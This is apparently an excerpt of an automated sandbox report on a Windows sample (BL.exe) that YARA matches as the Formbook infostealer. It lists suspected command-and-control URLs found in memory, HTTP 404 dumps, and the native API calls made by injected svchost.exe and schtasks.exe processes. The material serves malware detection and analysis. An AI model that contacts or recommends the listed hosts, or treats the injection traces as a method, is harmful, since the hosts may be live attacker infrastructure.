67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Mon, 21 Oct 2024 15:27:13 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 
67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: OmmtmfniIsg.exe, 00000006.00000002.4645986744.00000000040B0000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://emailverification.info/
            Source: OmmtmfniIsg.exe, 00000006.00000002.4645986744.0000000003744000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.givingaway123.net/1juc/?DJ=uNx48jdPyvmhqtM0&qFHlI=Sd7Ig8sUf85GUDOexfZI7d4fWBR1p2
            Source: OmmtmfniIsg.exe, 00000006.00000002.4649388492.0000000004B63000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.productanalytics.pro
            Source: OmmtmfniIsg.exe, 00000006.00000002.4649388492.0000000004B63000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.productanalytics.pro/9vwi/
            Source: schtasks.exe, 00000004.00000002.4650522552.000000000771E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: schtasks.exe, 00000004.00000002.4650522552.000000000771E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: schtasks.exe, 00000004.00000002.4650522552.000000000771E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: schtasks.exe, 00000004.00000002.4650522552.000000000771E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: schtasks.exe, 00000004.00000002.4650522552.000000000771E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: schtasks.exe, 00000004.00000002.4650522552.000000000771E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: schtasks.exe, 00000004.00000002.4650522552.000000000771E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: schtasks.exe, 00000004.00000002.4642699238.0000000002700000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: schtasks.exe, 00000004.00000003.2596677066.00000000076F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: schtasks.exe, 00000004.00000002.4642699238.0000000002700000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
            Source: schtasks.exe, 00000004.00000002.4642699238.0000000002700000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: schtasks.exe, 00000004.00000002.4642699238.0000000002700000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033r
            Source: schtasks.exe, 00000004.00000002.4642699238.0000000002700000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: schtasks.exe, 00000004.00000002.4642699238.0000000002700000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: schtasks.exe, 00000004.00000002.4648172740.0000000004040000.00000004.10000000.00040000.00000000.sdmp, OmmtmfniIsg.exe, 00000006.00000002.4645986744.0000000003420000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://whois.gandi.net/en/results?search=stocksm.fun
            Source: schtasks.exe, 00000004.00000002.4650522552.000000000771E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
            Source: schtasks.exe, 00000004.00000002.4648172740.0000000004040000.00000004.10000000.00040000.00000000.sdmp, OmmtmfniIsg.exe, 00000006.00000002.4645986744.0000000003420000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.gandi.net/en/domain
            Source: OmmtmfniIsg.exe, 00000006.00000002.4645986744.00000000040B0000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.icann.org/resources/pages/non-response-2014-01-29-en
            Source: OmmtmfniIsg.exe, 00000006.00000002.4645986744.0000000002F6A000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.sailforever.xyz/hshp/?qFHlI=MBiESr0hPmgVFuSDgT1s92jewHX1Ts8BjfLus90OagNghP1boqy5GATWCckP
            Source: C:\Users\user\Desktop\BL.exe Code function: 0_2_0046C5D0 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046C5D0
            Source: C:\Users\user\Desktop\BL.exe Code function: 0_2_00459FFF OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00459FFF
            Source: C:\Users\user\Desktop\BL.exe Code function: 0_2_00456354 GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW,0_2_00456354
            Source: C:\Users\user\Desktop\BL.exe Code function: 0_2_0047C08E SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C08E

            E-Banking Fraud

            Source: Yara match File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 00000004.00000002.4642083493.0000000000430000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000004.00000002.4645149295.0000000002960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000002.00000002.2374333248.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000004.00000002.4645447566.00000000029B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000002.4645860637.0000000002FB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000006.00000002.4649388492.0000000004B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000002.00000002.2374622096.0000000003290000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000002.00000002.2374964402.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4642083493.0000000000430000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4645149295.0000000002960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2374333248.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4645447566.00000000029B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4645860637.0000000002FB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4649388492.0000000004B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2374622096.0000000003290000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2374964402.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0042BEA3 NtClose,2_2_0042BEA3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03472B60 NtClose,LdrInitializeThunk,2_2_03472B60
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03472DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03472DF0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034735C0 NtCreateMutant,LdrInitializeThunk,2_2_034735C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03474340 NtSetContextThread,2_2_03474340
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03474650 NtSuspendThread,2_2_03474650
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03472BE0 NtQueryValueKey,2_2_03472BE0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03472BF0 NtAllocateVirtualMemory,2_2_03472BF0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03472B80 NtQueryInformationFile,2_2_03472B80
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03472BA0 NtEnumerateValueKey,2_2_03472BA0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03472AD0 NtReadFile,2_2_03472AD0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03472AF0 NtWriteFile,2_2_03472AF0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03472AB0 NtWaitForSingleObject,2_2_03472AB0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03472F60 NtCreateProcessEx,2_2_03472F60
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03472F30 NtCreateSection,2_2_03472F30
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03472FE0 NtCreateFile,2_2_03472FE0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03472F90 NtProtectVirtualMemory,2_2_03472F90
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03472FA0 NtQuerySection,2_2_03472FA0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03472FB0 NtResumeThread,2_2_03472FB0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03472E30 NtWriteVirtualMemory,2_2_03472E30
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03472EE0 NtQueueApcThread,2_2_03472EE0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03472E80 NtReadVirtualMemory,2_2_03472E80
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03472EA0 NtAdjustPrivilegesToken,2_2_03472EA0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03472D00 NtSetInformationFile,2_2_03472D00
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03472D10 NtMapViewOfSection,2_2_03472D10
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03472D30 NtUnmapViewOfSection,2_2_03472D30
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03472DD0 NtDelayExecution,2_2_03472DD0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03472DB0 NtEnumerateKey,2_2_03472DB0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03472C60 NtCreateKey,2_2_03472C60
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03472C70 NtFreeVirtualMemory,2_2_03472C70
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03472C00 NtQueryInformationProcess,2_2_03472C00
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03472CC0 NtQueryVirtualMemory,2_2_03472CC0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03472CF0 NtOpenProcess,2_2_03472CF0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03472CA0 NtQueryInformationToken,2_2_03472CA0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03473010 NtOpenDirectoryObject,2_2_03473010
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03473090 NtSetValueKey,2_2_03473090
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034739B0 NtGetContextThread,2_2_034739B0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03473D70 NtOpenThread,2_2_03473D70
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03473D10 NtOpenProcessToken,2_2_03473D10
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02D34340 NtSetContextThread,LdrInitializeThunk,4_2_02D34340
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02D34650 NtSuspendThread,LdrInitializeThunk,4_2_02D34650
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02D32AD0 NtReadFile,LdrInitializeThunk,4_2_02D32AD0
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02D32AF0 NtWriteFile,LdrInitializeThunk,4_2_02D32AF0
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02D32B60 NtClose,LdrInitializeThunk,4_2_02D32B60
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02D32EE0 NtQueueApcThread,LdrInitializeThunk,4_2_02D32EE0
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02D32FE0 NtCreateFile,LdrInitializeThunk,4_2_02D32FE0
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02D32FB0 NtResumeThread,LdrInitializeThunk,4_2_02D32FB0
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02D32F30 NtCreateSection,LdrInitializeThunk,4_2_02D32F30
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02D32CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_02D32CA0
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02D32C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_02D32C70
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02D32C60 NtCreateKey,LdrInitializeThunk,4_2_02D32C60
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02D32DD0 NtDelayExecution,LdrInitializeThunk,4_2_02D32DD0
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02D32DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_02D32DF0
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02D32D10 NtMapViewOfSection,LdrInitializeThunk,4_2_02D32D10
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02D32D30 NtUnmapViewOfSection,LdrInitializeThunk,4_2_02D32D30
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02D335C0 NtCreateMutant,LdrInitializeThunk,4_2_02D335C0
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02D339B0 NtGetContextThread,LdrInitializeThunk,4_2_02D339B0
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02D32AB0 NtWaitForSingleObject,4_2_02D32AB0
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02D32BF0 NtAllocateVirtualMemory,4_2_02D32BF0
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02D32BE0 NtQueryValueKey,4_2_02D32BE0
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02D32B80 NtQueryInformationFile,4_2_02D32B80
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02D32BA0 NtEnumerateValueKey,4_2_02D32BA0
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02D32E80 NtReadVirtualMemory,4_2_02D32E80
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02D32EA0 NtAdjustPrivilegesToken,4_2_02D32EA0
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02D32E30 NtWriteVirtualMemory,4_2_02D32E30
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02D32F90 NtProtectVirtualMemory,4_2_02D32F90
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02D32FA0 NtQuerySection,4_2_02D32FA0
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02D32F60 NtCreateProcessEx,4_2_02D32F60
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02D32CC0 NtQueryVirtualMemory,4_2_02D32CC0
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02D32CF0 NtOpenProcess,4_2_02D32CF0
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02D32C00 NtQueryInformationProcess,4_2_02D32C00
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02D32DB0 NtEnumerateKey,4_2_02D32DB0
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02D32D00 NtSetInformationFile,4_2_02D32D00
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02D33090 NtSetValueKey,4_2_02D33090
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02D33010 NtOpenDirectoryObject,4_2_02D33010
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02D33D70 NtOpenThread,4_2_02D33D70
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02D33D10 NtOpenProcessToken,4_2_02D33D10
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_00458CE0 NtCreateFile,4_2_00458CE0
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_00458E50 NtReadFile,4_2_00458E50
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_00458F50 NtDeleteFile,4_2_00458F50
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_00459000 NtClose,4_2_00459000
            Source: C:\Users\user\Desktop\BL.exe Code function: 0_2_00434D50: GetFullPathNameW,__swprintf,_wcslen,_wcslen,_wcslen,CreateDirectoryW,CreateFileW,_memset,_wcslen,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00434D50
            Source: C:\Users\user\Desktop\BL.exe Code function: 0_2_004461ED _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_004461ED
            Source: C:\Users\user\Desktop\BL.exe Code function: 0_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004364AA
            Source: C:\Users\user\Desktop\BL.exe Code function: 0_2_00412038 0_2_00412038
            Source: C:\Users\user\Desktop\BL.exe Code function: 0_2_00427161 0_2_00427161
            Source: C:\Users\user\Desktop\BL.exe Code function: 0_2_0047E1FA 0_2_0047E1FA
            Source: C:\Users\user\Desktop\BL.exe Code function: 0_2_004212BE 0_2_004212BE
            Source: C:\Users\user\Desktop\BL.exe Code function: 0_2_00443390 0_2_00443390
            Source: C:\Users\user\Desktop\BL.exe Code function: 0_2_00443391 0_2_00443391
            Source: C:\Users\user\Desktop\BL.exe Code function: 0_2_0041A46B 0_2_0041A46B
            Source: C:\Users\user\Desktop\BL.exe Code function: 0_2_0041240C 0_2_0041240C
            Source: C:\Users\user\Desktop\BL.exe Code function: 0_2_00446566 0_2_00446566
            Source: C:\Users\user\Desktop\BL.exe Code function: 0_2_004045E0 0_2_004045E0
            Source: C:\Users\user\Desktop\BL.exe Code function: 0_2_0041D750 0_2_0041D750
            Source: C:\Users\user\Desktop\BL.exe Code function: 0_2_004037E0 0_2_004037E0
            Source: C:\Users\user\Desktop\BL.exe Code function: 0_2_00427859 0_2_00427859
            Source: C:\Users\user\Desktop\BL.exe Code function: 0_2_00412818 0_2_00412818
            Source: C:\Users\user\Desktop\BL.exe Code function: 0_2_0040F890 0_2_0040F890
            Source: C:\Users\user\Desktop\BL.exe Code function: 0_2_0042397B 0_2_0042397B
            Source: C:\Users\user\Desktop\BL.exe Code function: 0_2_00409A40 0_2_00409A40
            Source: C:\Users\user\Desktop\BL.exe Code function: 0_2_00411B63 0_2_00411B63
            Source: C:\Users\user\Desktop\BL.exe Code function: 0_2_0047CBF0 0_2_0047CBF0
            Source: C:\Users\user\Desktop\BL.exe Code function: 0_2_0044EBBC 0_2_0044EBBC
            Source: C:\Users\user\Desktop\BL.exe Code function: 0_2_00412C38 0_2_00412C38
            Source: C:\Users\user\Desktop\BL.exe Code function: 0_2_0044ED9A 0_2_0044ED9A
            Source: C:\Users\user\Desktop\BL.exe Code function: 0_2_00423EBF 0_2_00423EBF
            Source: C:\Users\user\Desktop\BL.exe Code function: 0_2_00424F70 0_2_00424F70
            Source: C:\Users\user\Desktop\BL.exe Code function: 0_2_0041AF0D 0_2_0041AF0D
            Source: C:\Users\user\Desktop\BL.exe Code function: 0_2_03DDD618 0_2_03DDD618
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004180132_2_00418013
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040F8C32_2_0040F8C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040F8C72_2_0040F8C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040F8BA2_2_0040F8BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004161FE2_2_004161FE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004011902_2_00401190
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004162032_2_00416203
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FAE32_2_0040FAE3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DB632_2_0040DB63
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004013E02_2_004013E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004023B02_2_004023B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402C202_2_00402C20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042E4E32_2_0042E4E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DCA72_2_0040DCA7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401F302_2_00401F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004027B02_2_004027B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FA3522_2_034FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E3F02_2_0344E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035003E62_2_035003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E02742_2_034E0274
